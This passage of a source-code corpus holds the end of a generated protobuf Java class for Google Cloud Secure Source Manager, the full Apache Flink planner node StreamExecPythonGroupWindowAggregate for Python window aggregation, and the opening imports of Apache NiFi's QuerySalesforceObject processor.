* </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder> getPullRequestCommentsBuilderList() { return getPullRequestCommentsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.securesourcemanager.v1.PullRequestComment, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder, com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> getPullRequestCommentsFieldBuilder() { if (pullRequestCommentsBuilder_ == null) { pullRequestCommentsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.securesourcemanager.v1.PullRequestComment, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder, com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder>( pullRequestComments_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); pullRequestComments_ = null; } return pullRequestCommentsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) private static final com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse(); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse getDefaultInstance() { 
return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UnresolvePullRequestCommentsResponse> PARSER = new com.google.protobuf.AbstractParser<UnresolvePullRequestCommentsResponse>() { @java.lang.Override public UnresolvePullRequestCommentsResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UnresolvePullRequestCommentsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UnresolvePullRequestCommentsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/flink
36,137
flink-table/flink-table-planner/src/main/java/org/apache/flink/table/planner/plan/nodes/exec/stream/StreamExecPythonGroupWindowAggregate.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.flink.table.planner.plan.nodes.exec.stream; import org.apache.flink.FlinkVersion; import org.apache.flink.api.dag.Transformation; import org.apache.flink.api.java.tuple.Tuple2; import org.apache.flink.configuration.Configuration; import org.apache.flink.configuration.ReadableConfig; import org.apache.flink.core.memory.ManagedMemoryUseCase; import org.apache.flink.streaming.api.operators.OneInputStreamOperator; import org.apache.flink.streaming.api.transformations.OneInputTransformation; import org.apache.flink.table.api.TableException; import org.apache.flink.table.connector.Projection; import org.apache.flink.table.data.RowData; import org.apache.flink.table.expressions.FieldReferenceExpression; import org.apache.flink.table.expressions.ValueLiteralExpression; import org.apache.flink.table.functions.python.PythonAggregateFunctionInfo; import org.apache.flink.table.functions.python.PythonFunctionInfo; import org.apache.flink.table.functions.python.PythonFunctionKind; import org.apache.flink.table.planner.codegen.CodeGeneratorContext; import org.apache.flink.table.planner.codegen.ProjectionCodeGenerator; import org.apache.flink.table.planner.delegation.PlannerBase; import 
org.apache.flink.table.planner.plan.logical.LogicalWindow; import org.apache.flink.table.planner.plan.logical.SessionGroupWindow; import org.apache.flink.table.planner.plan.logical.SlidingGroupWindow; import org.apache.flink.table.planner.plan.logical.TumblingGroupWindow; import org.apache.flink.table.planner.plan.nodes.exec.ExecEdge; import org.apache.flink.table.planner.plan.nodes.exec.ExecNode; import org.apache.flink.table.planner.plan.nodes.exec.ExecNodeConfig; import org.apache.flink.table.planner.plan.nodes.exec.ExecNodeContext; import org.apache.flink.table.planner.plan.nodes.exec.ExecNodeMetadata; import org.apache.flink.table.planner.plan.nodes.exec.InputProperty; import org.apache.flink.table.planner.plan.nodes.exec.utils.CommonPythonUtil; import org.apache.flink.table.planner.plan.nodes.exec.utils.ExecNodeUtil; import org.apache.flink.table.planner.plan.utils.AggregateInfoList; import org.apache.flink.table.planner.plan.utils.AggregateUtil; import org.apache.flink.table.planner.plan.utils.KeySelectorUtil; import org.apache.flink.table.planner.plan.utils.PythonUtil; import org.apache.flink.table.planner.plan.utils.WindowEmitStrategy; import org.apache.flink.table.planner.utils.JavaScalaConversionUtil; import org.apache.flink.table.planner.utils.TableConfigUtils; import org.apache.flink.table.runtime.dataview.DataViewSpec; import org.apache.flink.table.runtime.generated.GeneratedProjection; import org.apache.flink.table.runtime.groupwindow.NamedWindowProperty; import org.apache.flink.table.runtime.keyselector.RowDataKeySelector; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.CountSlidingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.CountTumblingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.GroupWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.SessionWindowAssigner; import 
org.apache.flink.table.runtime.operators.window.groupwindow.assigners.SlidingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.assigners.TumblingWindowAssigner; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.ElementTriggers; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.EventTimeTriggers; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.ProcessingTimeTriggers; import org.apache.flink.table.runtime.operators.window.groupwindow.triggers.Trigger; import org.apache.flink.table.runtime.typeutils.InternalTypeInfo; import org.apache.flink.table.runtime.util.TimeWindowUtil; import org.apache.flink.table.types.logical.RowType; import org.apache.flink.shaded.jackson2.com.fasterxml.jackson.annotation.JsonCreator; import org.apache.flink.shaded.jackson2.com.fasterxml.jackson.annotation.JsonProperty; import org.apache.calcite.rel.core.AggregateCall; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.lang.reflect.Constructor; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; import java.time.ZoneId; import java.util.Arrays; import java.util.Collections; import java.util.List; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.hasRowIntervalType; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.hasTimeIntervalType; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.isProctimeAttribute; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.isRowtimeAttribute; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.toDuration; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.toLong; import static org.apache.flink.table.planner.plan.utils.AggregateUtil.transformToStreamAggregateInfoList; import static org.apache.flink.util.Preconditions.checkArgument; import static 
org.apache.flink.util.Preconditions.checkNotNull; /** Stream {@link ExecNode} for group widow aggregate (Python user defined aggregate function). */ @ExecNodeMetadata( name = "stream-exec-python-group-window-aggregate", version = 1, producedTransformations = StreamExecPythonGroupWindowAggregate.PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION, minPlanVersion = FlinkVersion.v1_16, minStateVersion = FlinkVersion.v1_16) public class StreamExecPythonGroupWindowAggregate extends StreamExecAggregateBase { private static final Logger LOGGER = LoggerFactory.getLogger(StreamExecPythonGroupWindowAggregate.class); public static final String PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION = "python-group-window-aggregate"; public static final String FIELD_NAME_WINDOW = "window"; public static final String FIELD_NAME_NAMED_WINDOW_PROPERTIES = "namedWindowProperties"; private static final String ARROW_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME = "org.apache.flink.table.runtime.operators.python.aggregate.arrow.stream." + "StreamArrowPythonGroupWindowAggregateFunctionOperator"; private static final String GENERAL_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME = "org.apache.flink.table.runtime.operators.python.aggregate." 
+ "PythonStreamGroupWindowAggregateOperator"; private static final String GENERAL_STREAM_PYTHON_CREATE_TUMBLING_GROUP_WINDOW_METHOD = "createTumblingGroupWindowAggregateOperator"; private static final String GENERAL_STREAM_PYTHON_CREATE_SLIDING_GROUP_WINDOW_METHOD = "createSlidingGroupWindowAggregateOperator"; private static final String GENERAL_STREAM_PYTHON_CREATE_SESSION_GROUP_WINDOW_METHOD = "createSessionGroupWindowAggregateOperator"; @JsonProperty(FIELD_NAME_GROUPING) private final int[] grouping; @JsonProperty(FIELD_NAME_AGG_CALLS) private final AggregateCall[] aggCalls; @JsonProperty(FIELD_NAME_WINDOW) private final LogicalWindow window; @JsonProperty(FIELD_NAME_NAMED_WINDOW_PROPERTIES) private final NamedWindowProperty[] namedWindowProperties; @JsonProperty(FIELD_NAME_NEED_RETRACTION) private final boolean needRetraction; @JsonProperty(FIELD_NAME_GENERATE_UPDATE_BEFORE) private final boolean generateUpdateBefore; public StreamExecPythonGroupWindowAggregate( ReadableConfig tableConfig, int[] grouping, AggregateCall[] aggCalls, LogicalWindow window, NamedWindowProperty[] namedWindowProperties, boolean generateUpdateBefore, boolean needRetraction, InputProperty inputProperty, RowType outputType, String description) { this( ExecNodeContext.newNodeId(), ExecNodeContext.newContext(StreamExecPythonGroupWindowAggregate.class), ExecNodeContext.newPersistedConfig( StreamExecPythonGroupWindowAggregate.class, tableConfig), grouping, aggCalls, window, namedWindowProperties, generateUpdateBefore, needRetraction, Collections.singletonList(inputProperty), outputType, description); } @JsonCreator public StreamExecPythonGroupWindowAggregate( @JsonProperty(FIELD_NAME_ID) int id, @JsonProperty(FIELD_NAME_TYPE) ExecNodeContext context, @JsonProperty(FIELD_NAME_CONFIGURATION) ReadableConfig persistedConfig, @JsonProperty(FIELD_NAME_GROUPING) int[] grouping, @JsonProperty(FIELD_NAME_AGG_CALLS) AggregateCall[] aggCalls, @JsonProperty(FIELD_NAME_WINDOW) LogicalWindow window, 
@JsonProperty(FIELD_NAME_NAMED_WINDOW_PROPERTIES) NamedWindowProperty[] namedWindowProperties, @JsonProperty(FIELD_NAME_GENERATE_UPDATE_BEFORE) boolean generateUpdateBefore, @JsonProperty(FIELD_NAME_NEED_RETRACTION) boolean needRetraction, @JsonProperty(FIELD_NAME_INPUT_PROPERTIES) List<InputProperty> inputProperties, @JsonProperty(FIELD_NAME_OUTPUT_TYPE) RowType outputType, @JsonProperty(FIELD_NAME_DESCRIPTION) String description) { super(id, context, persistedConfig, inputProperties, outputType, description); checkArgument(inputProperties.size() == 1); this.grouping = checkNotNull(grouping); this.aggCalls = checkNotNull(aggCalls); this.window = checkNotNull(window); this.namedWindowProperties = checkNotNull(namedWindowProperties); this.generateUpdateBefore = generateUpdateBefore; this.needRetraction = needRetraction; } @SuppressWarnings("unchecked") @Override protected Transformation<RowData> translateToPlanInternal( PlannerBase planner, ExecNodeConfig config) { final boolean isCountWindow; if (window instanceof TumblingGroupWindow) { isCountWindow = hasRowIntervalType(((TumblingGroupWindow) window).size()); } else if (window instanceof SlidingGroupWindow) { isCountWindow = hasRowIntervalType(((SlidingGroupWindow) window).size()); } else { isCountWindow = false; } if (isCountWindow && grouping.length > 0 && config.getStateRetentionTime() < 0) { LOGGER.warn( "No state retention interval configured for a query which accumulates state." + " Please provide a query configuration with valid retention interval to" + " prevent excessive state size. 
You may specify a retention time of 0 to" + " not clean up the state."); } final ExecEdge inputEdge = getInputEdges().get(0); final Transformation<RowData> inputTransform = (Transformation<RowData>) inputEdge.translateToPlan(planner); final RowType inputRowType = (RowType) inputEdge.getOutputType(); final RowType outputRowType = InternalTypeInfo.of(getOutputType()).toRowType(); final int inputTimeFieldIndex; if (isRowtimeAttribute(window.timeAttribute())) { inputTimeFieldIndex = window.timeAttribute().getFieldIndex(); if (inputTimeFieldIndex < 0) { throw new TableException( "Group window must defined on a time attribute, " + "but the time attribute can't be found.\n" + "This should never happen. Please file an issue."); } } else { inputTimeFieldIndex = -1; } final ZoneId shiftTimeZone = TimeWindowUtil.getShiftTimeZone( window.timeAttribute().getOutputDataType().getLogicalType(), TableConfigUtils.getLocalTimeZone(config)); Tuple2<GroupWindowAssigner<?>, Trigger<?>> windowAssignerAndTrigger = generateWindowAssignerAndTrigger(); GroupWindowAssigner<?> windowAssigner = windowAssignerAndTrigger.f0; Trigger<?> trigger = windowAssignerAndTrigger.f1; final Configuration pythonConfig = CommonPythonUtil.extractPythonConfiguration( planner.getTableConfig(), planner.getFlinkContext().getClassLoader()); final ExecNodeConfig pythonNodeConfig = ExecNodeConfig.ofNodeConfig(pythonConfig, config.isCompiled()); boolean isGeneralPythonUDAF = Arrays.stream(aggCalls) .anyMatch(x -> PythonUtil.isPythonAggregate(x, PythonFunctionKind.GENERAL)); OneInputTransformation<RowData, RowData> transform; WindowEmitStrategy emitStrategy = WindowEmitStrategy.apply(config, window); if (isGeneralPythonUDAF) { final boolean[] aggCallNeedRetractions = new boolean[aggCalls.length]; Arrays.fill(aggCallNeedRetractions, needRetraction); final AggregateInfoList aggInfoList = transformToStreamAggregateInfoList( planner.getTypeFactory(), inputRowType, JavaScalaConversionUtil.toScala(Arrays.asList(aggCalls)), 
aggCallNeedRetractions, needRetraction, true, true); transform = createGeneralPythonStreamWindowGroupOneInputTransformation( inputTransform, inputRowType, outputRowType, inputTimeFieldIndex, windowAssigner, aggInfoList, emitStrategy.getAllowLateness(), pythonConfig, pythonNodeConfig, planner.getFlinkContext().getClassLoader(), shiftTimeZone); } else { transform = createPandasPythonStreamWindowGroupOneInputTransformation( inputTransform, inputRowType, outputRowType, inputTimeFieldIndex, windowAssigner, trigger, emitStrategy.getAllowLateness(), pythonConfig, pythonNodeConfig, planner.getFlinkContext().getClassLoader(), shiftTimeZone); } if (CommonPythonUtil.isPythonWorkerUsingManagedMemory( pythonConfig, planner.getFlinkContext().getClassLoader())) { transform.declareManagedMemoryUseCaseAtSlotScope(ManagedMemoryUseCase.PYTHON); } // set KeyType and Selector for state final RowDataKeySelector selector = KeySelectorUtil.getRowDataSelector( planner.getFlinkContext().getClassLoader(), grouping, InternalTypeInfo.of(inputRowType)); transform.setStateKeySelector(selector); transform.setStateKeyType(selector.getProducedType()); return transform; } private Tuple2<GroupWindowAssigner<?>, Trigger<?>> generateWindowAssignerAndTrigger() { GroupWindowAssigner<?> windowAssiger; Trigger<?> trigger; if (window instanceof TumblingGroupWindow) { TumblingGroupWindow tumblingWindow = (TumblingGroupWindow) window; FieldReferenceExpression timeField = tumblingWindow.timeField(); ValueLiteralExpression size = tumblingWindow.size(); if (isProctimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = TumblingWindowAssigner.of(toDuration(size)).withProcessingTime(); trigger = ProcessingTimeTriggers.afterEndOfWindow(); } else if (isRowtimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = TumblingWindowAssigner.of(toDuration(size)).withEventTime(); trigger = EventTimeTriggers.afterEndOfWindow(); } else if (isProctimeAttribute(timeField) && 
hasRowIntervalType(size)) { windowAssiger = CountTumblingWindowAssigner.of(toLong(size)); trigger = ElementTriggers.count(toLong(size)); } else { // TODO: EventTimeTumblingGroupWindow should sort the stream on event time // before applying the windowing logic. Otherwise, this would be the same as a // ProcessingTimeTumblingGroupWindow throw new UnsupportedOperationException( "Event-time grouping windows on row intervals are currently not supported."); } } else if (window instanceof SlidingGroupWindow) { SlidingGroupWindow slidingWindow = (SlidingGroupWindow) window; FieldReferenceExpression timeField = slidingWindow.timeField(); ValueLiteralExpression size = slidingWindow.size(); ValueLiteralExpression slide = slidingWindow.slide(); if (isProctimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = SlidingWindowAssigner.of(toDuration(size), toDuration(slide)) .withProcessingTime(); trigger = ProcessingTimeTriggers.afterEndOfWindow(); } else if (isRowtimeAttribute(timeField) && hasTimeIntervalType(size)) { windowAssiger = SlidingWindowAssigner.of(toDuration(size), toDuration(slide)); trigger = EventTimeTriggers.afterEndOfWindow(); } else if (isProctimeAttribute(timeField) && hasRowIntervalType(size)) { windowAssiger = CountSlidingWindowAssigner.of(toLong(size), toLong(slide)); trigger = ElementTriggers.count(toLong(size)); } else { // TODO: EventTimeTumblingGroupWindow should sort the stream on event time // before applying the windowing logic. 
Otherwise, this would be the same as a // ProcessingTimeTumblingGroupWindow throw new UnsupportedOperationException( "Event-time grouping windows on row intervals are currently not supported."); } } else if (window instanceof SessionGroupWindow) { SessionGroupWindow sessionWindow = (SessionGroupWindow) window; FieldReferenceExpression timeField = sessionWindow.timeField(); ValueLiteralExpression gap = sessionWindow.gap(); if (isProctimeAttribute(timeField)) { windowAssiger = SessionWindowAssigner.withGap(toDuration(gap)); trigger = ProcessingTimeTriggers.afterEndOfWindow(); } else if (isRowtimeAttribute(timeField)) { windowAssiger = SessionWindowAssigner.withGap(toDuration(gap)); trigger = EventTimeTriggers.afterEndOfWindow(); } else { throw new UnsupportedOperationException("This should not happen."); } } else { throw new TableException("Unsupported window: " + window.toString()); } return Tuple2.of(windowAssiger, trigger); } private OneInputTransformation<RowData, RowData> createPandasPythonStreamWindowGroupOneInputTransformation( Transformation<RowData> inputTransform, RowType inputRowType, RowType outputRowType, int inputTimeFieldIndex, GroupWindowAssigner<?> windowAssigner, Trigger<?> trigger, long allowance, Configuration pythonConfig, ExecNodeConfig config, ClassLoader classLoader, ZoneId shiftTimeZone) { Tuple2<int[], PythonFunctionInfo[]> aggInfos = CommonPythonUtil.extractPythonAggregateFunctionInfosFromAggregateCall(aggCalls); int[] pythonUdafInputOffsets = aggInfos.f0; PythonFunctionInfo[] pythonFunctionInfos = aggInfos.f1; OneInputStreamOperator<RowData, RowData> pythonOperator = getPandasPythonStreamGroupWindowAggregateFunctionOperator( config, classLoader, pythonConfig, inputRowType, outputRowType, windowAssigner, trigger, allowance, inputTimeFieldIndex, pythonUdafInputOffsets, pythonFunctionInfos, shiftTimeZone); return ExecNodeUtil.createOneInputTransformation( inputTransform, createTransformationMeta(PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION, 
config), pythonOperator, InternalTypeInfo.of(outputRowType), inputTransform.getParallelism(), false); } private OneInputTransformation<RowData, RowData> createGeneralPythonStreamWindowGroupOneInputTransformation( Transformation<RowData> inputTransform, RowType inputRowType, RowType outputRowType, int inputTimeFieldIndex, GroupWindowAssigner<?> windowAssigner, AggregateInfoList aggInfoList, long allowance, Configuration pythonConfig, ExecNodeConfig pythonNodeConfig, ClassLoader classLoader, ZoneId shiftTimeZone) { final int inputCountIndex = aggInfoList.getIndexOfCountStar(); final boolean countStarInserted = aggInfoList.countStarInserted(); final Tuple2<PythonAggregateFunctionInfo[], DataViewSpec[][]> aggInfosAndDataViewSpecs = CommonPythonUtil.extractPythonAggregateFunctionInfos(aggInfoList, aggCalls); PythonAggregateFunctionInfo[] pythonFunctionInfos = aggInfosAndDataViewSpecs.f0; DataViewSpec[][] dataViewSpecs = aggInfosAndDataViewSpecs.f1; OneInputStreamOperator<RowData, RowData> pythonOperator = getGeneralPythonStreamGroupWindowAggregateFunctionOperator( pythonConfig, classLoader, inputRowType, outputRowType, windowAssigner, pythonFunctionInfos, dataViewSpecs, inputTimeFieldIndex, inputCountIndex, generateUpdateBefore, countStarInserted, allowance, shiftTimeZone); return ExecNodeUtil.createOneInputTransformation( inputTransform, createTransformationMeta( PYTHON_GROUP_WINDOW_AGGREGATE_TRANSFORMATION, pythonNodeConfig), pythonOperator, InternalTypeInfo.of(outputRowType), inputTransform.getParallelism(), false); } @SuppressWarnings({"unchecked", "rawtypes"}) private OneInputStreamOperator<RowData, RowData> getPandasPythonStreamGroupWindowAggregateFunctionOperator( ExecNodeConfig config, ClassLoader classLoader, Configuration pythonConfig, RowType inputRowType, RowType outputRowType, GroupWindowAssigner<?> windowAssigner, Trigger<?> trigger, long allowance, int inputTimeFieldIndex, int[] udafInputOffsets, PythonFunctionInfo[] pythonFunctionInfos, ZoneId 
shiftTimeZone) { Class clazz = CommonPythonUtil.loadClass( ARROW_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME, classLoader); RowType userDefinedFunctionInputType = (RowType) Projection.of(udafInputOffsets).project(inputRowType); RowType userDefinedFunctionOutputType = (RowType) Projection.range( grouping.length, outputRowType.getFieldCount() - namedWindowProperties.length) .project(outputRowType); try { Constructor<OneInputStreamOperator<RowData, RowData>> ctor = clazz.getConstructor( Configuration.class, PythonFunctionInfo[].class, RowType.class, RowType.class, RowType.class, int.class, GroupWindowAssigner.class, Trigger.class, long.class, NamedWindowProperty[].class, ZoneId.class, GeneratedProjection.class); return ctor.newInstance( pythonConfig, pythonFunctionInfos, inputRowType, userDefinedFunctionInputType, userDefinedFunctionOutputType, inputTimeFieldIndex, windowAssigner, trigger, allowance, namedWindowProperties, shiftTimeZone, ProjectionCodeGenerator.generateProjection( new CodeGeneratorContext(config, classLoader), "UdafInputProjection", inputRowType, userDefinedFunctionInputType, udafInputOffsets)); } catch (NoSuchMethodException | IllegalAccessException | InstantiationException | InvocationTargetException e) { throw new TableException( "Python StreamArrowPythonGroupWindowAggregateFunctionOperator constructed failed.", e); } } @SuppressWarnings({"unchecked", "rawtypes"}) private OneInputStreamOperator<RowData, RowData> getGeneralPythonStreamGroupWindowAggregateFunctionOperator( Configuration config, ClassLoader classLoader, RowType inputType, RowType outputType, GroupWindowAssigner<?> windowAssigner, PythonAggregateFunctionInfo[] aggregateFunctions, DataViewSpec[][] dataViewSpecs, int inputTimeFieldIndex, int indexOfCountStar, boolean generateUpdateBefore, boolean countStarInserted, long allowance, ZoneId shiftTimeZone) { Class clazz = CommonPythonUtil.loadClass( GENERAL_STREAM_PYTHON_GROUP_WINDOW_AGGREGATE_FUNCTION_OPERATOR_NAME, 
classLoader); boolean isRowTime = AggregateUtil.isRowtimeAttribute(window.timeAttribute()); try { if (window instanceof TumblingGroupWindow) { ValueLiteralExpression size = ((TumblingGroupWindow) window).size(); Method create = clazz.getMethod( GENERAL_STREAM_PYTHON_CREATE_TUMBLING_GROUP_WINDOW_METHOD, Configuration.class, RowType.class, RowType.class, PythonAggregateFunctionInfo[].class, DataViewSpec[][].class, int[].class, int.class, boolean.class, boolean.class, int.class, GroupWindowAssigner.class, boolean.class, boolean.class, long.class, long.class, NamedWindowProperty[].class, ZoneId.class); return (OneInputStreamOperator<RowData, RowData>) create.invoke( null, config, inputType, outputType, aggregateFunctions, dataViewSpecs, grouping, indexOfCountStar, generateUpdateBefore, countStarInserted, inputTimeFieldIndex, windowAssigner, isRowTime, AggregateUtil.hasTimeIntervalType(size), AggregateUtil.toDuration(size).toMillis(), allowance, namedWindowProperties, shiftTimeZone); } else if (window instanceof SlidingGroupWindow) { ValueLiteralExpression size = ((SlidingGroupWindow) window).size(); ValueLiteralExpression slide = ((SlidingGroupWindow) window).slide(); Method create = clazz.getMethod( GENERAL_STREAM_PYTHON_CREATE_SLIDING_GROUP_WINDOW_METHOD, Configuration.class, RowType.class, RowType.class, PythonAggregateFunctionInfo[].class, DataViewSpec[][].class, int[].class, int.class, boolean.class, boolean.class, int.class, GroupWindowAssigner.class, boolean.class, boolean.class, long.class, long.class, long.class, NamedWindowProperty[].class, ZoneId.class); return (OneInputStreamOperator<RowData, RowData>) create.invoke( null, config, inputType, outputType, aggregateFunctions, dataViewSpecs, grouping, indexOfCountStar, generateUpdateBefore, countStarInserted, inputTimeFieldIndex, windowAssigner, isRowTime, AggregateUtil.hasTimeIntervalType(size), AggregateUtil.toDuration(size).toMillis(), AggregateUtil.toDuration(slide).toMillis(), allowance, 
namedWindowProperties, shiftTimeZone); } else if (window instanceof SessionGroupWindow) { ValueLiteralExpression gap = ((SessionGroupWindow) window).gap(); Method create = clazz.getMethod( GENERAL_STREAM_PYTHON_CREATE_SESSION_GROUP_WINDOW_METHOD, Configuration.class, RowType.class, RowType.class, PythonAggregateFunctionInfo[].class, DataViewSpec[][].class, int[].class, int.class, boolean.class, boolean.class, int.class, GroupWindowAssigner.class, boolean.class, long.class, long.class, NamedWindowProperty[].class, ZoneId.class); return (OneInputStreamOperator<RowData, RowData>) create.invoke( null, config, inputType, outputType, aggregateFunctions, dataViewSpecs, grouping, indexOfCountStar, generateUpdateBefore, countStarInserted, inputTimeFieldIndex, windowAssigner, isRowTime, AggregateUtil.toDuration(gap).toMillis(), allowance, namedWindowProperties, shiftTimeZone); } } catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) { throw new TableException( "Python PythonStreamGroupWindowAggregateOperator constructed failed.", e); } throw new RuntimeException(String.format("Unsupported LogicWindow Type %s", window)); } }
apache/nifi
35,992
nifi-extension-bundles/nifi-salesforce-bundle/nifi-salesforce-processors/src/main/java/org/apache/nifi/processors/salesforce/QuerySalesforceObject.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.nifi.processors.salesforce; import com.fasterxml.jackson.core.JsonEncoding; import com.fasterxml.jackson.core.JsonFactory; import com.fasterxml.jackson.core.JsonGenerator; import com.fasterxml.jackson.core.JsonParser; import com.fasterxml.jackson.core.JsonToken; import com.fasterxml.jackson.databind.ObjectMapper; import org.apache.camel.component.salesforce.api.dto.SObjectDescription; import org.apache.camel.component.salesforce.api.dto.SObjectField; import org.apache.nifi.annotation.behavior.InputRequirement; import org.apache.nifi.annotation.behavior.InputRequirement.Requirement; import org.apache.nifi.annotation.behavior.Stateful; import org.apache.nifi.annotation.behavior.TriggerSerially; import org.apache.nifi.annotation.behavior.WritesAttribute; import org.apache.nifi.annotation.behavior.WritesAttributes; import org.apache.nifi.annotation.configuration.DefaultSchedule; import org.apache.nifi.annotation.documentation.CapabilityDescription; import org.apache.nifi.annotation.documentation.SeeAlso; import org.apache.nifi.annotation.documentation.Tags; import org.apache.nifi.annotation.lifecycle.OnScheduled; import org.apache.nifi.components.AllowableValue; import 
org.apache.nifi.components.PropertyDescriptor; import org.apache.nifi.components.ValidationContext; import org.apache.nifi.components.ValidationResult; import org.apache.nifi.components.state.Scope; import org.apache.nifi.components.state.StateMap; import org.apache.nifi.expression.ExpressionLanguageScope; import org.apache.nifi.flowfile.FlowFile; import org.apache.nifi.flowfile.attributes.CoreAttributes; import org.apache.nifi.json.JsonParserFactory; import org.apache.nifi.json.JsonTreeRowRecordReader; import org.apache.nifi.json.SchemaApplicationStrategy; import org.apache.nifi.json.StartingFieldStrategy; import org.apache.nifi.oauth2.OAuth2AccessTokenProvider; import org.apache.nifi.processor.AbstractProcessor; import org.apache.nifi.processor.ProcessContext; import org.apache.nifi.processor.ProcessSession; import org.apache.nifi.processor.Relationship; import org.apache.nifi.processor.exception.ProcessException; import org.apache.nifi.processor.io.OutputStreamCallback; import org.apache.nifi.processor.util.StandardValidators; import org.apache.nifi.processors.salesforce.rest.SalesforceConfiguration; import org.apache.nifi.processors.salesforce.rest.SalesforceRestClient; import org.apache.nifi.processors.salesforce.schema.SalesforceSchemaHolder; import org.apache.nifi.processors.salesforce.schema.SalesforceToRecordSchemaConverter; import org.apache.nifi.processors.salesforce.util.IncrementalContext; import org.apache.nifi.processors.salesforce.util.SalesforceQueryBuilder; import org.apache.nifi.processors.salesforce.validator.SalesforceAgeValidator; import org.apache.nifi.scheduling.SchedulingStrategy; import org.apache.nifi.schema.access.SchemaNotFoundException; import org.apache.nifi.serialization.MalformedRecordException; import org.apache.nifi.serialization.RecordSetWriter; import org.apache.nifi.serialization.RecordSetWriterFactory; import org.apache.nifi.serialization.SimpleRecordSchema; import org.apache.nifi.serialization.WriteResult; import 
